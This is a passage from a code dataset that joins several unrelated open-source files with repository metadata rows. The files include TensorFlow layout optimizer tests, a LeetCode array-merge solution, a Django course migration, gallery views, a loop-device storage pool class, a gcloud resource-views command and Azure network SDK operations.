x_val = [1.7] * 784
with session.Session() as sess:
output_val_ref = sess.run(output, feed_dict={x: x_val})
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(
output, run_metadata=metadata, feed_dict={
x: x_val
})
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if node.name.startswith('LayoutOptimizerTranspose'):
num_transposes += 1
nodes.append(node.name)
expected_num_transposes = 1
self.assertEqual(expected_num_transposes, num_transposes)
self.assertIn('LayoutOptimizerTransposeNHWCToNCHW-Conv2D-0', nodes)
self.assertIn('LayoutOptimizerVecPermuteNCHWToNHWC-ShapeN-0-0', nodes)
self.assertAllEqual(output_val_ref, output_val)
def testLoop(self):
if test.is_gpu_available(cuda_only=True):
output = _loop()
with session.Session() as sess:
output_val_ref = sess.run(output)
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(output, run_metadata=metadata)
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if node.name.startswith('LayoutOptimizerTranspose'):
num_transposes += 1
nodes.append(node.name)
# Four transposes were initially added in the Expand phase of
# LayoutOptimizer; two of them are cancelled out in the Collapse phase.
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
self.assertEqual(expected_num_transposes, num_transposes)
self.assertIn('LayoutOptimizerTransposeNHWCToNCHW-map/while/Conv2D-0',
nodes)
self.assertIn(
'LayoutOptimizerTransposeNCHWToNHWC-map/while/MaxPool_1-0-2', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testLoopWithBranch(self):
if test.is_gpu_available(cuda_only=True):
output = _loop_with_branch()
with session.Session() as sess:
output_val_ref = sess.run(output)
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(output, run_metadata=metadata)
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if node.name.startswith('LayoutOptimizerTranspose'):
num_transposes += 1
nodes.append(node.name)
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
self.assertIn('LayoutOptimizerTransposeNHWCToNCHW-map/while/Conv2D-0',
nodes)
self.assertIn('LayoutOptimizerTransposeNCHWToNHWC-map/while/Add-0-2',
nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testLoopWithVecAnd4D(self):
if test.is_gpu_available(cuda_only=True):
output = _loop_with_vec_and_4d()
with session.Session() as sess:
output_val_ref = sess.run(output)
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(output, run_metadata=metadata)
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if node.name.startswith('LayoutOptimizerTranspose'):
num_transposes += 1
nodes.append(node.name)
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
self.assertIn('LayoutOptimizerTransposeNHWCToNCHW-map/while/Conv2D-0',
nodes)
self.assertIn('LayoutOptimizerTransposeNCHWToNHWC-map/while/Add-0-2',
nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testBinaryOpSecondPort(self):
if test.is_gpu_available(cuda_only=True):
output = _model_with_second_port()
with session.Session() as sess:
output_val_ref = sess.run(output)
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(output, run_metadata=metadata)
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if node.name.startswith('LayoutOptimizerTranspose'):
num_transposes += 1
nodes.append(node.name)
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
self.assertIn('LayoutOptimizerTransposeNHWCToNCHW-FusedBatchNorm-0',
nodes)
self.assertIn('LayoutOptimizerTransposeNCHWToNHWC-Add-0-0', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testGradient(self):
meta_graph = _simple_metagraph()
rewrite_options = rewriter_config_pb2.RewriterConfig(
layout_optimizer=rewriter_config_pb2.RewriterConfig.ON)
optimized_graph = tf_optimizer.OptimizeGraph(
rewrite_options, meta_graph, cluster=_get_cluster())
found = 0
for node in optimized_graph.node:
if node.op in ['Conv2D', 'Conv2DBackpropFilter', 'Conv2DBackpropInput']:
found += 1
self.assertEqual(node.attr['data_format'].s, b'NCHW')
self.assertEqual(found, 5)
def testDepthwise(self):
meta_graph = _simple_metagraph(depthwise=True)
rewrite_options = rewriter_config_pb2.RewriterConfig(
layout_optimizer=rewriter_config_pb2.RewriterConfig.ON)
optimized_graph = tf_optimizer.OptimizeGraph(
rewrite_options, meta_graph, cluster=_get_cluster())
found = 0
for node in optimized_graph.node:
if node.op in [
'DepthwiseConv2dNative', 'DepthwiseConv2dNativeBackpropFilter',
'DepthwiseConv2dNativeBackpropInput'
]:
found += 1
self.assertEqual(node.attr['data_format'].s, b'NCHW')
self.assertEqual(found, 6)
def testCheckpointCompatibility(self):
if not test.is_gpu_available(cuda_only=True):
self.skipTest('GPU required')
checkpoint_path = self.get_temp_dir()
self._train(checkpoint_path)
vars_expected = self._train(checkpoint_path, restore=True)
vars_layout_optimized = self._train(
checkpoint_path, restore=True, layout_optimizer=True)
for var_expected, var_layout_optimized in zip(vars_expected,
vars_layout_optimized):
self.assertAllClose(var_expected, var_layout_optimized, atol=1e-6)
if __name__ == '__main__':
test.main()
| [
"[email protected]"
] | |
6e2270dae209181b8af5ff3dcc9eea8dc4033c64 | f6ed7bc808f5536bc77166fe5c3571e5c028f308 | /neptune/internal/cli/commands/executing/null_executor.py | b7ba6ca006a08ffa645f0c58a15b0419a5cec32f | [
"Apache-2.0"
] | permissive | jiji-online/neptune-cli | d086bb59725b7545f3e0f80bd89e8f99ff3851a0 | 50cf680a80d141497f9331ab7cdaee49fcb90b0c | refs/heads/main | 2023-07-18T17:56:10.671562 | 2021-09-14T07:54:13 | 2021-09-14T07:54:13 | 406,275,162 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 742 | py | #
# Copyright (c) 2017, deepsense.io
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from future.builtins import object
class NullExecutor(object):
def execute(self, experiment, args):
pass
def abort(self):
pass
| [
"[email protected]"
] | |
b70471b30ed693024129232b607386dcc2056eed | 4d05be863b63a56a90b4c46b15069827b33ecaae | /Algorithms/leetcode/088_merge_sorted_array.py | cdc7c4756f42f6563a0e1d9faa78195016a55fbc | [] | no_license | leeo1116/PyCharm | e532fa9754056019508cc454214ee1a8ad9b26a9 | b6942c05c27556e5fe47879e8b823845c84c5430 | refs/heads/master | 2022-11-06T00:43:14.882453 | 2017-07-13T04:50:00 | 2017-07-13T04:50:00 | 36,851,636 | 0 | 1 | null | 2022-10-20T10:44:39 | 2015-06-04T06:09:09 | Python | UTF-8 | Python | false | false | 775 | py | __author__ = 'Liang Li'
class Solution:
# @param {integer[]} nums1
# @param {integer} m
# @param {integer[]} nums2
# @param {integer} n
# @return {void} Do not return anything, modify nums1 in-place instead.
def merge(self, nums1, m, nums2, n):
i = m-1
j = n-1
k = m+n-1
while i >= 0 and j >= 0:
if nums1[i] > nums2[j]:
nums1[k] = nums1[i]
i -= 1
k -= 1
else:
nums1[k] = nums2[j]
j -= 1
k -= 1
while j >= 0:
nums1[k] = nums2[j]
j -= 1
k -= 1
s = Solution()
nums1 = [2, 5, 8, 12, 0, 0, 0, 0]
nums2 = [1, 3, 4, 10]
s.merge(nums1, 4, nums2, 4)
print(nums1) | [
"[email protected]"
] | |
2316ed9192f542f72a25d3038b16c60e3271862f | 68b7d7b72a9d87123373f1e4523bf3655564769d | /backend/course/migrations/0001_initial.py | 0ce22a04074cfc9aad1aacd1a19265b0239921a5 | [] | no_license | crowdbotics-apps/help-procrastinatio-22418 | c5a85b31e85b87e9d4e39f402ca3f037d916c990 | b2a967a5b930ba5cacbeeea702ca9aba71899687 | refs/heads/master | 2023-01-09T12:19:42.589420 | 2020-11-08T23:45:22 | 2020-11-08T23:45:22 | 311,177,250 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,517 | py | # Generated by Django 2.2.17 on 2020-11-08 23:44
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Category',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=256)),
],
),
migrations.CreateModel(
name='Course',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(blank=True, max_length=256, null=True)),
('description', models.TextField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='course_author', to=settings.AUTH_USER_MODEL)),
('categories', models.ManyToManyField(blank=True, related_name='course_categories', to='course.Category')),
],
),
migrations.CreateModel(
name='Event',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=256)),
('date', models.DateTimeField()),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='event_user', to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Group',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=256)),
],
),
migrations.CreateModel(
name='SubscriptionType',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=256)),
],
),
migrations.CreateModel(
name='Subscription',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('subscription_type', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='subscription_subscription_type', to='course.SubscriptionType')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='subscription_user', to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Recording',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('media', models.URLField()),
('published', models.DateTimeField()),
('event', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='recording_event', to='course.Event')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='recording_user', to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='PaymentMethod',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('primary', models.BooleanField()),
('token', models.CharField(max_length=256)),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='paymentmethod_user', to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Module',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=256)),
('description', models.TextField()),
('course', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='module_course', to='course.Course')),
],
),
migrations.CreateModel(
name='Lesson',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=256)),
('description', models.TextField()),
('media', models.URLField()),
('module', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='lesson_module', to='course.Module')),
],
),
migrations.CreateModel(
name='Enrollment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('course', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='enrollment_course', to='course.Course')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='enrollment_user', to=settings.AUTH_USER_MODEL)),
],
),
]
| [
"[email protected]"
] | |
2b40da75789f55119d250b7354c69c87b1f8de71 | b23d294fdffabe72c336644f119860f5ce704eef | /python_1000phone/预科/day1-turtle/01-第一个python代码.py | bc791ddb4d9c798be10d6dc7d7d522d3d4d2a228 | [] | no_license | ikaros274556330/my_code | 65232758fd20820e9f4fa8cb5a6c91a1969862a2 | 92db21c4abcbd88b7bd77e78d9f660b4534b5071 | refs/heads/master | 2020-11-26T09:43:58.200990 | 2019-12-23T02:08:39 | 2019-12-23T02:08:39 | 229,032,315 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 42 | py | # 打印hello world!
print('hello world!') | [
"[email protected]"
] | |
99681c36be3784e520c6d493f540d54bbb5b6ac4 | d8a5fc2195165c970e2340eee87ae2ad5322da29 | /{{cookiecutter.repo_name}}/{{cookiecutter.project_name}}/photos/views.py | 48573cfdc703cc624f8d89eccaf4fa0037280c73 | [
"BSD-3-Clause"
] | permissive | lendlsmith/chrisdev-cookiecutter | b76e6194aa8369c2dbf1dac73e3282e025d2b146 | e0ab2d16bd1a066800ce46bb1740b1254c259a70 | refs/heads/master | 2021-10-11T22:20:02.391847 | 2014-07-21T16:57:32 | 2014-07-21T16:57:32 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 644 | py | from django.views.generic import ListView, DetailView
from filer.models import Folder
class GalleryListView(ListView):
#context_object_name = "gallery_list"
try:
queryset = Folder.objects.get(
name='Gallery').children.all().order_by('-created_at')
except Folder.DoesNotExist:
queryset = None
template_name = "gallery/gallery_archive.html"
class GalleryDetailView(DetailView):
#context_object_name = "gallery"
try:
queryset = Folder.objects.get(name='Gallery').children.all()
except Folder.DoesNotExist:
queryset = None
template_name = "gallery/gallery_detail.html" | [
"[email protected]"
] | |
4528a59aa0db7486bbbf2a3cb6b8db98636d7a1b | 17e60f61fc82e7369802a1c597b58b0206ad9bec | /lib/poolLoop.py | 0a25964115c941e48f0dbddf08013eda3d965d6c | [] | no_license | SLB-DeN/opensvc | 5e06d42947f51662fa16203a00670a88b9e1fea9 | 75baeb19e0d26d5e150e770aef4d615c2327f32e | refs/heads/master | 2021-05-17T05:35:18.585791 | 2020-03-19T15:20:05 | 2020-03-19T15:20:05 | 250,651,667 | 1 | 0 | null | 2020-03-27T21:29:22 | 2020-03-27T21:29:22 | null | UTF-8 | Python | false | false | 1,366 | py | from __future__ import print_function
import os
import pool
import rcExceptions as ex
from rcUtilities import lazy, justcall
class Pool(pool.Pool):
type = "loop"
capabilities = ["rox", "rwx", "roo", "rwo", "blk"]
@lazy
def path(self):
return self.oget("path")
def translate(self, name=None, size=None, fmt=True, shared=False):
data = [
{
"rtype": "disk",
"type": "loop",
"file": os.path.join(self.path, "%s.img" % name),
"size": size,
}
]
if fmt:
data += self.add_fs(name, shared)
return data
def pool_status(self):
from converters import convert_size
if not os.path.exists(self.path):
os.makedirs(self.path)
data = {
"name": self.name,
"type": self.type,
"capabilities": self.capabilities,
}
cmd = ["df", "-P", self.path]
out, err, ret = justcall(cmd)
if ret != 0:
return data
l = out.splitlines()[-1].split()
data["free"] = convert_size(l[3], default_unit="K", _to="k")
data["used"] = convert_size(l[2], default_unit="K", _to="k")
data["size"] = convert_size(l[1], default_unit="K", _to="k")
data["head"] = self.path
return data
| [
"[email protected]"
] | |
9498aefa8f146488465c0dc49bcdcfecb6c2c61c | 3b84c4b7b16ccfd0154f8dcb75ddbbb6636373be | /google-cloud-sdk/lib/googlecloudsdk/surface/compute/resource_views/resources/add.py | 91a1766af1560f7ca696cc64491c0c49bb5e745d | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | twistedpair/google-cloud-sdk | 37f04872cf1ab9c9ce5ec692d2201a93679827e3 | 1f9b424c40a87b46656fc9f5e2e9c81895c7e614 | refs/heads/master | 2023-08-18T18:42:59.622485 | 2023-08-15T00:00:00 | 2023-08-15T12:14:05 | 116,506,777 | 58 | 24 | null | 2022-02-14T22:01:53 | 2018-01-06T18:40:35 | Python | UTF-8 | Python | false | false | 2,988 | py | # Copyright 2014 Google Inc. All Rights Reserved.
"""'resourceviews resources add' command."""
from apiclient import errors
from googlecloudsdk.api_lib.compute import rolling_updates_util as util
from googlecloudsdk.calliope import base
from googlecloudsdk.calliope import exceptions
from googlecloudsdk.core import log
from googlecloudsdk.core import properties
class Add(base.Command):
"""Add resources to a resource view."""
@staticmethod
def Args(parser):
"""Args is called by calliope to gather arguments for this command.
Args:
parser: An argparse parser that you can use to add arguments that go
on the command line after this command. Positional arguments are
allowed.
"""
parser.add_argument(
'resource',
nargs='+',
help=('A list of fully-qualified URLs to each resource that should '
'be added to this view. For example: '
'https://www.googleapis.com/compute/v1/projects/myproject/'
'zones/us-central1-a/instances/instance-1'))
def Run(self, args):
"""Run 'resourceviews resources add'.
Args:
args: argparse.Namespace, The arguments that this command was invoked
with.
Raises:
HttpException: A http error response was received while executing api
request.
ToolException: An error other than http error occured while executing
the command.
"""
zone_views_client = self.context['zoneViewsClient']
region_views_client = self.context['regionViewsClient']
project = properties.VALUES.core.project.Get(required=True)
request_body = {'resources': args.resource}
if 'v1beta1' in self.context['api_version']:
if args.region:
request = region_views_client.addresources(
projectName=project,
region=args.region,
resourceViewName=args.resourceview,
body=request_body)
else:
request = zone_views_client.addresources(
projectName=project,
zone=args.zone,
resourceViewName=args.resourceview,
body=request_body)
else:
request = zone_views_client.addResources(
project=project,
zone=args.zone,
resourceView=args.resourceview,
body=request_body)
try:
request.execute()
log.Print('Resources added to resource view {0}.'.format(
args.resourceview))
except errors.HttpError as error:
raise exceptions.HttpException(util.GetError(error))
except errors.Error as error:
raise exceptions.ToolException(error)
Add.detailed_help = {
'brief': 'Add resources to a resource view.',
'DESCRIPTION': """\
This command adds resources to a resource view. You must provide a
list of fully-qualified URLs for each resource.
Alternatively, you can also use the addinstances command and provide
resource names rather than URLs.
""",
}
| [
"[email protected]"
] | |
f57a5a411bc4bd9daee914c2fc13faf4310bdc9b | 97ca8aedfc7959f99bf5add51c2fbb9d535c5aff | /tcml_tools/slurmer/parse/group.py | 6142cd427c107f81a3ddab7c8eda3c9d7558ae77 | [] | no_license | cogsys-tuebingen/tcml_tools | 74b930b8109ef0ad559584bb51808edb83fe4e8c | 4eabeb08e34993143c729136dc4349043dde00ad | refs/heads/main | 2023-06-02T02:27:13.915943 | 2021-06-09T07:01:23 | 2021-06-09T07:01:23 | 359,801,189 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,582 | py | import numpy as np
from typing import Union
from collections import OrderedDict, defaultdict
from tcml_tools.slurmer.parse import Result, Metrics
class Group:
"""
A group of slurm jobs that share parameters (except e.g. seed)
metrics will be computed over groups
"""
default_result = Result("__default__", -1, float_acc=1)
all_param_keys = OrderedDict()
all_result_keys = OrderedDict()
def __init__(self, name: str, ids: list, **kwargs):
self.name = name
self.ids = [int(i) for i in ids]
self.params = kwargs
self.data = defaultdict(dict)
self.results = OrderedDict()
for k in kwargs.keys():
Group.all_param_keys[k] = True
def get(self, key: str, default=None):
""" get param/result, or default otherwise """
if key in self.params:
return self.params.get(key)
if key in self.results:
return self.results.get(key).value
return default
def get_param_tuple(self, skip_keys=()) -> tuple:
""" get a tuple of all parameter-values, except for the skipped ones """
return tuple([self.params.get(k, '') for k in self.all_param_keys.keys() if k not in skip_keys])
@staticmethod
def __filter(dct: OrderedDict, ignore_keys=()) -> OrderedDict:
new_dct = dct.copy()
for key in ignore_keys:
new_dct.pop(key, None)
return new_dct
@staticmethod
def sorted_param_keys(**filter_kwargs):
""" all known parameter keys of all groups """
return sorted([k for k in Group.__filter(Group.all_param_keys, **filter_kwargs).keys()])
def merge(self, other: 'Group'):
""" merge another group into this one, keep this name """
self.ids.extend(other.ids)
self.params.update(other.params)
self.data.update(other.data)
l0, l1 = len(self.results), len(other.results)
self.results.update(other.results)
assert len(self.results) == l0+l1, "Some results were overwritten by merging!"
def update_all_data(self, data: {str: dict}):
""" updates the data of all group members that are in the data dict """
for id_ in self.ids:
if id_ in data:
self.data[id_].update(data.get(id_))
def update_data(self, id_: int, data: dict):
""" updates the data of group member with slurm id """
self.data[id_].update(data)
def update_results(self, metrics: [Metrics]):
for m in metrics:
values, missing = self._values(key=m.get_key(), last_k=m.last_k)
try:
for result in m.from_values(values):
self.results[result.name] = max([result, self.results.get(result.name)])
Group.all_result_keys[result.name] = True
except KeyError:
raise KeyError('Missing key "%s" in: %s, but the metric requires it' % (m.get_key(), missing))
def _values(self, key: str, last_k=-1) -> (Union[np.array, None], list):
"""
all values, different group members on axis 0, time series on axis 1, (can be None)
and a list of slurm ids where the values are missing
"""
values = []
missing = []
for id_, data in self.data.items():
if key not in data:
missing.append(id_)
continue
v = np.array([v[2] for v in data.get(key)]) # tensorboard has (step, time, value) triplets
if isinstance(last_k, int) and (last_k > 0):
v = v[-last_k:]
values.append(v)
assert all([len(v) == len(values[0]) for v in values]), "different value-array lengths for key=%s" % key
if len(values) > 0:
return np.stack(values, axis=0), missing
return None, missing
def __header_dict(self, separator: str, **filter_kwargs) -> dict:
# param_keys = Group.sorted_param_keys(**filter_kwargs)
param_keys = list(self.__filter(self.all_param_keys, **filter_kwargs).keys())
value_keys = list(self.__filter(self.all_result_keys, **filter_kwargs).keys())
return {
'n': 'name',
'ids': 'slurm_ids',
'params': separator.join(param_keys),
'values': separator.join(value_keys),
}
def __table_dict(self, separator: str, **filter_kwargs) -> dict:
# param_keys = Group.sorted_param_keys(**filter_kwargs)
param_keys = list(self.__filter(self.all_param_keys, **filter_kwargs).keys())
value_keys = list(self.__filter(self.all_result_keys, **filter_kwargs).keys())
return {
'n': self.name,
'ids': str(self.ids),
'params': separator.join([str(self.params.get(k, '')) for k in param_keys]),
'values': separator.join([self.results.get(k, self.default_result).str for k in value_keys]),
}
def get_csv_str_header(self, **filter_kwargs) -> str:
""" table csv header, e.g. for libre office calc """
return '{n};{ids};;{params};;{values};'.format(**self.__header_dict(';', **filter_kwargs))
def get_csv_str(self, **filter_kwargs) -> str:
""" table csv row, e.g. for libre office calc, printing params and the metric values """
return '{n};{ids};;{params};;{values};'.format(**self.__table_dict(';', **filter_kwargs))
def get_latex_str_header(self, **filter_kwargs) -> str:
""" table header for latex """
return '{n} & {params} & {values} \\\\'.format(**self.__header_dict(' & ', **filter_kwargs)).replace('_', '\_')
def get_latex_str(self, **filter_kwargs) -> str:
""" table row for latex, printing params and the metric values """
return '{n} & {params} & {values} \\\\'.format(**self.__table_dict(' & ', **filter_kwargs)).replace('_', '\_')
class GroupSeparator(Group):
"""
simple hack to just insert a midrule into latex tables, and empty rows into csv data
will probably break everything if added first to a GroupManager, so don't do that
"""
_id = -1
def __init__(self, **kwargs):
self._id += 1
super().__init__('separator %d' % self._id, [], **kwargs)
def update_results(self, metrics):
pass
def get_csv_str(self, **filter_kwargs) -> str:
""" table row for libre office calc, printing params and the metric values """
return ''
def get_latex_str(self, **filter_kwargs) -> str:
""" table row for latex, printing params and the metric values """
return '\\midrule'
| [
"[email protected]"
] | |
bf827dd87006c899990aacccbb562772fcbfd3e6 | 78d35bb7876a3460d4398e1cb3554b06e36c720a | /sdk/network/azure-mgmt-network/azure/mgmt/network/v2021_05_01/operations/_load_balancer_frontend_ip_configurations_operations.py | be7b0ac5d709fb10ed6105bb3d5c250f99998522 | [
"MIT",
"LicenseRef-scancode-generic-cla",
"LGPL-2.1-or-later"
] | permissive | catchsrinivas/azure-sdk-for-python | e35f59b60318a31b3c940a7a3a07b61b28118aa5 | 596227a7738a5342274486e30489239d539b11d1 | refs/heads/main | 2023-08-27T09:08:07.986249 | 2021-11-11T11:13:35 | 2021-11-11T11:13:35 | 427,045,896 | 0 | 0 | MIT | 2021-11-11T15:14:31 | 2021-11-11T15:14:31 | null | UTF-8 | Python | false | false | 9,049 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.mgmt.core.exceptions import ARMErrorFormat
from .. import models as _models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class LoadBalancerFrontendIPConfigurationsOperations(object):
"""LoadBalancerFrontendIPConfigurationsOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2021_05_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def list(
self,
resource_group_name, # type: str
load_balancer_name, # type: str
**kwargs # type: Any
):
# type: (...) -> Iterable["_models.LoadBalancerFrontendIPConfigurationListResult"]
"""Gets all the load balancer frontend IP configurations.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param load_balancer_name: The name of the load balancer.
:type load_balancer_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either LoadBalancerFrontendIPConfigurationListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2021_05_01.models.LoadBalancerFrontendIPConfigurationListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.LoadBalancerFrontendIPConfigurationListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2021-05-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'loadBalancerName': self._serialize.url("load_balancer_name", load_balancer_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('LoadBalancerFrontendIPConfigurationListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/loadBalancers/{loadBalancerName}/frontendIPConfigurations'} # type: ignore
def get(
self,
resource_group_name, # type: str
load_balancer_name, # type: str
frontend_ip_configuration_name, # type: str
**kwargs # type: Any
):
# type: (...) -> "_models.FrontendIPConfiguration"
"""Gets load balancer frontend IP configuration.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param load_balancer_name: The name of the load balancer.
:type load_balancer_name: str
:param frontend_ip_configuration_name: The name of the frontend IP configuration.
:type frontend_ip_configuration_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: FrontendIPConfiguration, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2021_05_01.models.FrontendIPConfiguration
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.FrontendIPConfiguration"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2021-05-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'loadBalancerName': self._serialize.url("load_balancer_name", load_balancer_name, 'str'),
'frontendIPConfigurationName': self._serialize.url("frontend_ip_configuration_name", frontend_ip_configuration_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('FrontendIPConfiguration', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
